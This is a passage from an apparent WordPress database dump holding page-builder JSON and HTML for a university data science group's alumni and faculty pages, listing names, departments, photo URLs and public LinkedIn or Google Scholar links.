Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c171\",\"index\":1,\"id\":\"182-c175\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c176\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c176\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Alex-e1697208598736.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1782,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c176\",\"index\":0,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c176\",\"index\":2,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c176\",\"index\":1,\"id\":\"182-c180\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c181\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c181\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1784,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c181\",\"index\":0,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c181\",\"index\":2,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c181\",\"index\":1,\"id\":\"182-c185\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c186\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c186\",\"index\":0,\"id\":\"182-c187\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1786,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c186\",\"index\":0,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c186\",\"index\":2,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c186\",\"index\":1,\"id\":\"182-c190\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c191\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c191\",\"index\":0,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1788,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c191\",\"index\":0,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c191\",\"index\":2,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c191\",\"index\":1,\"id\":\"182-c195\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c196\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c196\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1790,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c196\",\"index\":0,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c196\",\"index\":2,\"id\":\"182-c199\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c196\",\"index\":1,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c201\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c201\",\"index\":0,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1792,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c201\",\"index\":0,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c201\",\"index\":2,\"id\":\"182-c204\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c205\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c205\",\"index\":0,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1794,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c205\",\"index\":0,\"id\":\"182-c207\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c205\",\"index\":2,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c205\",\"index\":1,\"id\":\"182-c209\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c210\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c210\",\"index\":0,\"id\":\"182-c211\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1795,\"size\":\"\"},\"domuuid\":\"182-c161\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c210\",\"index\":0,\"id\":\"182-c212\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Eliza Schuh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c210\",\"index\":2,\"id\":\"182-c213\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/search\\/results\\/all\\/?fetchDeterministicClustersOnly=true&heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&keywords=eliza%20schuh&origin=RICH_QUERY_TYPEAHEAD_HISTORY&position=0&searchId=e7657352-5ea3-4501-b984-d21542771bc4&sid=WW)&spellCorrectionEnabled=true\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c210\",\"index\":1,\"id\":\"182-c214\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c215\",\"parentId\":\"182-c165\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c215\",\"index\":0,\"id\":\"182-c216\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bronson-e1697209357897.png\",\"caption\":{\"text\":\"\"},\"imageId\":1797,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c215\",\"index\":0,\"id\":\"182-c217\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c215\",\"index\":2,\"id\":\"182-c218\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c215\",\"index\":1,\"id\":\"182-c219\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c165\",\"parentId\":\"182-c164\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c164\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c222\",\"parentId\":\"182-c221\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c221\",\"parentId\":\"182-c220\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c220\",\"parentId\":\"182-c164\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2024-11-07 12:31:50','2024-11-07 17:31:50','',562,'https://gsudice.dataconn.net/?p=1852',0,'revision','',0),(1853,1,'2024-11-07 12:31:50','2024-11-07 17:31:50','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c70\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c70 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c71-outer\">\n            <div data-colibri-id=\"182-c71\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c71 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c72\" class=\"h-global-transition-all h-heading style-986 style-local-182-c72 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c72\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\" class=\"wp-image-1697 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 